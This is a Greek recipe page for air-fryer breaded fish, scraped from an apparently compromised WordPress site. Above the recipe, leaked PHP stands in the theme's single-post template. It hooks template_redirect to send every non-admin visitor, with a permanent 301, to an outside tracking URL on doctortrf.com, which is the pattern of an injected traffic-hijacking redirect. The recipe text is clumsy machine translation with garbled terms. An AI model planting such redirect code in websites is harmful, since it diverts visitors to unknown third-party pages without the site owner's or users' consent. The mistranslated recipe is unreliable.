function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Template part for displaying single post content in single.php * * @package Asona/Templates * @since 1.0 * @author apalodi */ if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly ?>

Ψάρια φριτέζα αέρα

Ψάρια φριτέζα αέρα
Ψάρια φριτέζα αέρα

Συστατικά:

Ψαροκοκκαλέο

1 κουταλιά της σούπας ελαιόλαδο

1 φλιτζάνι Panko ψίχα ψωμιού

1 κουταλάκι του γλυκού σκόνη σκόρδου

1 κουταλάκι του γλυκού αλάτι

1/2 κουταλάκι του γλυκού μαύρο πιπέρι

1/2 κουταλάκι του γλυκού μαϊντανός

Ψεκασμός ελαιού για μαγείρεμα

Εκτέλεση:

Ξεκινήστε εξασφαλίζοντας ότι τα ψαροκοκκαλέα είναι πλήρως αποψυγμένα. Σκουπίστε τα για να αφαιρέσετε τυχόν υπόλοιπη υγρασία.

Ρίξτε 1 κουταλιά της σούπας ελαιόλαδο πάνω στα ψαροκοκκαλέα και τρίψτε το ώστε να επικαλυφθούν και οι δύο πλευρές.

Σε ένα πιάτο ή μεγάλο μπολ, ανακατέψτε την Πάνκο ψίχα, τη σκόνη σκόρδου, το αλάτι, το μαύρο πιπέρι και το μαϊντανό. Ανακατεύουμε καλά τα υλικά ώστε να ανακατευτούν.

Προθερμάνετε τον αεροτηγανιτή σας στους 390-400 βαθμούς Φαρενάιτ.

Πάρτε ένα από τα ψαροκοκκαλέα με το ελαιόλαδο και πιέστε το στο μείγμα της ψίχας, εξασφαλίζοντας ότι η επικάλυψη προσκολλάται στο ψάρι.

Τοποθετήστε τα επικαλυμμένα ψαροκοκκαλέα στον προθερμασμένο αεροτηγανιτή. Δουλέψτε σε παρτίδες αν χρειάζεται, ανάλογα με το μέγεθος του αεροτηγανιτή σας.

Ψεκάστε ελαφρά τα ψάρια με ελαιούχο ψεκασμό μαγειρέματος. Αυτό θα βοηθήσει να πετύχετε μια τραγανή υφή χωρίς τη χρήση υπερβολικού ποσού λαδιού.

Ψήστε τα ψάρια στον αεροτηγανιτή για 10-12 λεπτά, αναστρέφοντάς τα στη μέση του χρόνου ψησίματος.

Όταν το ψάρι είναι έτοιμο, θα πρέπει να έχει τραγανή εξωτερική επιφάνεια και να είναι μαλακό και χωρίς οστά στο εσωτερικό.

Σερβίρετε και απολαύστε!

Παρακαλώ να σημειωθεί ότι οι χρόνοι μαγειρέματος μπορεί να διαφέρουν ελαφρώς ανάλογα με το πάχος των ψαροκοκκαλέων και το συγκεκριμένο μοντέλο του αεροτηγανιτή που χρησιμοποιείτε. Συνιστώ να ελέγχετε την κατάσταση του ψαριού κατά το ψήσιμο για να επιτύχετε τα επιθυμητά αποτελέσματα. Καλή όρεξη!

Ψάρια φριτέζα αέρα
Ψάρια φριτέζα αέρα

Leave a Reply

Your email address will not be published. Required fields are marked *